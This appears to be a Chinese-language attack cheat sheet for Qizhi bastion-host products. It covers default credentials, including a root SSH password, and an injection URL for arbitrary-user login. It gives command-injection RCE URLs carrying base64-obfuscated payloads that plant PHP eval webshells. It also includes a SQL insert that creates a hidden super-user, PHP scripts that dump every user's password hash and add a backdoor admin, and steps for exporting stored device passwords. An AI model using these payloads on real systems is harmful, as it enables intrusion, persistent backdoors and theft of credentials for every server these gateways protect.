齐治

目录

• 堡垒机JAVA
  • 默认口令
  • 前渗透
  • 后渗透
    • 创建超级用户
    • 向主机下发命令
    • 访问资产
• 堡垒机PHP
  • 前渗透
    • 任意用户登录
    • 后台rce
    • 前台RCE（CNVD-2019-20835）
  • 后渗透
    • 获取管理员密码
    • 新建管理员
    • 设备密码导出

怎么判断堡垒机是java还是php？用chrome插件wappalyzer！

堡垒机JAVA

app="齐治科技-堡垒机"

默认口令

默认账号密码为admin/admin

SSH用户：root

SSH密码：4OO88O2393

前渗透

无公开漏洞

后渗透

创建超级用户

登录数据库

psql -U shterm -h 127.0.0.1  -d shterm

执行

INSERT INTO "public"."tbl_user" ("id", "login_name", "user_name", "passwd", "email", "role_id", "authtype_id", "auth_info", "state", "ext_info", "extra", "last_login_time", "pwd_change_time", "authtoken_id", "valid_from", "valid_to", "pwd_valid", "join_time", "join_user", "update_time", "deleted", "remark", "ssh_key", "user_type", "region_id", "delete_time", "disabled_time", "department_id", "audit_scope", "user_category") VALUES (10088, 'shtermManager', 'shtermManager', '{bcrypt}$2a$10$5Jt5ncvrj5rBZtfQR6YQaeWIuqqJZd1k1KSU23umZeFU89fCYu4la', NULL, 1, 1, '{"passwordType": "custom"}', 0, '{}', '{"locale": {"country": "CN", "language": "zh"}, "userNav": [{"name": "User.nav_All", "useOr": false, "filters": []}, {"name": "role.ROLE_CONFIG", "useOr": false, "filters": [{"attr": "role.id", "oper": "In", "value": "2"}]}, {"name": "role.ROLE_ADMIN", "useOr": false, "filters": [{"attr": "role.id", "oper": "In", "value": "1"}]}, {"name": "User.nav_NoGroup", "useOr": false, "filters": [{"attr": "usergroups", "oper": "Null", "value": "true"}]}, {"name": "User.state.3", "useOr": false, "filters": [{"attr": "state", "oper": "In", "value": "3"}]}, {"name": "User.state.2", "useOr": false, "filters": [{"attr": "state", "oper": "In", "value": "2"}]}, {"name": "User.state.1", "useOr": false, "filters": [{"attr": "state", "oper": "In", "value": "1"}]}, {"name": "User.nav_Inactive", "useOr": true, "filters": [{"attr": "lastLoginTime", "oper": "Before", "value": "2021-08-21"}, {"attr": "lastLoginTime", "oper": "Null", "value": "true"}]}], "appOldNav": [{"name": "dev.appall", "count": 0, "useOr": false, "filters": [{"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "B/S", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "B/S"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "C/S", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "C/S"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Weblogic", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Weblogic"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "B/S IE", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "B/S IE"}, {"attr": "type", "oper": "Is", "value": "3"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}], "devOldNav": [{"name": "dev.hostall", "count": 0, "useOr": false, "filters": [{"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Linux", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Linux"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Windows", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Windows"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "HP UX", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "HP UX"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "IBM AIX", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "IBM AIX"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "IBM AS/400", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Is", "value": "IBM AS/400"}, {"attr": "type", "oper": "Is", "value": "0"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}], "accessServ": {"changepwd": 1690250316342, "automation": 1690250226507, "deviceaccess": 1690199078938}, "indexWidgets": [], "changePlanNav": [{"name": "secretChangePlan.nav_plan_All", "filters": [{"attr": "status", "oper": "Is", "value": "0"}]}, {"name": "secretChangePlan.nav_plan_maunl", "filters": [{"attr": "execType", "oper": "Is", "value": "1"}, {"attr": "status", "oper": "Is", "value": "0"}]}, {"name": "secretChangePlan.nav_plan_fail", "filters": [{"attr": "execResult", "oper": "Is", "value": "2"}, {"attr": "status", "oper": "Is", "value": "0"}]}], "updateListNav": [{"name": "cloud.update.all", "useOr": false, "filters": []}, {"name": "cloud.process.1", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "1"}]}, {"name": "cloud.process.4", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "4"}]}, {"name": "cloud.process.2", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "2"}]}, {"name": "cloud.process.3", "useOr": false, "filters": [{"attr": "status", "oper": "Is", "value": "3"}]}], "databaseOldNav": [{"name": "dev.databaseall", "count": 0, "useOr": false, "filters": [{"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "Oracle", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "Oracle"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "MYSQL", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "MYSQL"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "MSSQL", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "MSSQL"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}, {"name": "DB2", "count": 0, "useOr": false, "filters": [{"attr": "sysType.name", "oper": "Contains", "value": "DB2"}, {"attr": "type", "oper": "Is", "value": "2"}, {"attr": "state", "oper": "Is", "value": "0"}, {"attr": "deleted", "oper": "Is", "value": "false"}]}]}', '2021-11-21 04:04:04.612', '2021-11-21 09:55:32.875', NULL, NULL, NULL, 0, NULL, NULL, '2021-11-21 09:55:32.875', 'f', NULL, NULL, 0, NULL, NULL, NULL, 1, NULL, 0);

用户名：shtermManager

密码：Shterm10086

登录后修改密码，即可获得完整权限

向主机下发命令

工作台→自动化→增加脚本任务→添加目标资产→自定义命令→立即执行

访问资产

1. web服务访问：工作台→访问资产
2. rdp访问：rdp登录堡垒机，输入web服务的账户密码，进去后就是可登录列表
3. ssh访问：输入web服务的账户密码，进去后就是可登录列表

堡垒机PHP

前渗透

任意用户登录

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

状态码返回200，存在漏洞；“错误ID”提示，不存在漏洞。

后台rce

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true

或者

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=127.0.0.1&identity_cond=&query_type=all&format=json&browse=true&priority=`id`

写webshell到 /var/www/icons/tui/，然后访问/icons/tui/service.php

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=127.0.0.1&identity_cond=&query_type=all&format=json&browse=true&priority=`echo${IFS}ZWNobyAnPD9waHAgQGV2YWwoJF9QT1NUWzkwXSk7Pz4nID4gL3Zhci93d3cvaWNvbnMvdHVpL3NlcnZpY2UucGhw|base64${IFS}-d|sh` 

前台RCE（CNVD-2019-20835）

访问如下url返回ok即存在。

/listener/cluster_manage.php

然后访问如下链接，即可在根目录 /var/www/shterm/resources/qrcode/lbj77.php 下生成PHP一句话马

https://10.20.10.10/ha_request.php?action=install&ipaddr=localhost&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

然后访问如下链接即可使用webshell

/resources/qrcode/lbj77.php

后渗透

获取管理员密码

拿到shell后，在 /icons/tui/ 目录下新建 common.php 文件，然后访问 /icons/tui/common.php即可看到各用户hash，hash可到cmd5解密

<?PHP
$CONFIG["nomenu"] = true;
$CONFIG["nochangepw"] = true;
require_once("/var/www/shterm/include/common.php");

$q1 = pg_escape("SELECT count(*) FROM identity");
$r1 = pg_fetch_assoc($q1);
echo "用户数量：";
print_r($r1);

$q = pg_escape("SELECT * FROM identity");
$i = 0;
while($r = pg_fetch_assoc($q)){
    ++$i;
    echo "
    ";
    echo  "
    id ：" . $r["id"];
    if($r["status"] == 1){$status = "否";}else{$status = "是";}
    echo  "
    是否禁用 ：" . $status;
    if( $r["role_admin"] == 1 && $r["role_manager"] == 1 && $r["role_audit"] == 1 && $r["role_shell"]==1 && $r["role_pwrcpt"]==1 ){
        $usertype = "超级管理员";
    }elseif ($r["role_admin"] == 1) {
       $usertype = "超级管理员";
    }elseif ($r["role_manager"] == 1) {
         $usertype = "配置管理员";
    }elseif ($r["role_audit"] == 1) {
         $usertype = "审计管理员";
    }elseif ($r["role_shell"] == 1) {
         $usertype = "普通用户";
    }elseif ($r["role_pwrcpt"] == 1) {
         $usertype = "密码保管员";
    }
    echo  "
    用户类型 ：" . $usertype;
    echo  "
    登录名：" . $r["login"];
    echo "
    姓名：" . $r['name'];
    echo "
    密码信息：" . $r['auth_data'];
}

?>

新建管理员

如果管理员密码实在无法解密，就新建一个吧。

在 /icons/tui/ 目录下新建 about.php 文件

用户名：360team

密码： shterm

<?PHP
$CONFIG["nomenu"] = true;
$CONFIG["nochangepw"] = true;
require_once("/var/www/shterm/include/common.php");

$q2 = pg_escape("INSERT INTO identity(id,status,login,name,company,department,domain,post,number,email,mobile,auth_method,auth_data,x509_dn,auth,passwd_salt,passwd_sha1,passwd_expire,passwd_change,ipaddr_limit,crypt_passwd,pgp_pubkey,role_admin,role_manager,role_audit,role_shell,role_pwrcpt,default_dept,valid_date1,valid_date2,create_stamp,modify_stamp,create_identity,lastlogin_stamp,tui_client,server_grid_way,remark,theme,client_tuires,client_guires,totp_params,challenge_message,challenge_state,options,attrs,perms) VALUES(100900,'1','360team','360team','','ROOT','1','','','','','1','{\"hash\": \"9a15a976afaefb1d3e1ac21f62be336e2054c3d0\", \"times\": 1, \"expire\": \"\", \"algo\": \"shterm1\", \"salt\": \"nukj4rT0aa\", \"change\": false}','','native','','',null,null,'','','',1,1,1,1,1,null,null,null,null,'2023-01-13 10:44:17.965318',null,'2023-01-16 13:14:47.295477','','','','','','','','','','{\"perms\":\"\"}','','{\"manager\":[1],\"audit\":[1],\"pwrcpt\":[1]}')");
$r2 = pg_fetch_assoc($q2);
echo "新增用户成功";

设备密码导出

首先把账户弄成密码保管员权限。 然后点击账户设置→修改设置（输入用户的登录密码）→zip文件密码设置zip解压密码。 然后密码控制→密码备份即可导出一份密码本zip，解压密码为刚刚设置好的zip解压密码。 如果要连接设备，可以直接ssh或者rdp上去连，用户密码为堡垒机web服务的用户密码.